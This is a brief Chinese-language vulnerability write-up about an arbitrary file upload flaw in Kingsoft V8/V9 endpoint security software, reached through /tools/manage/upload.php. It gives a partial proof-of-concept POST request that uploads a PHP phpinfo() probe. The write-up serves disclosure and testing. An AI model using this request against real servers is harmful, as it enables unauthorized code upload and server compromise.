金山 V8 V9 终端安全系统 文件上传漏洞

漏洞描述

参考链接：

• https://forum.butian.net/share/76

漏洞复现

在tools目录下的mange下存在一个upload.php。该文件可导致任意文件上传。

poc：

POST /tools/manage/upload.php HTTP/1.1
HOST: target
...
<?php phpinfo(); ?>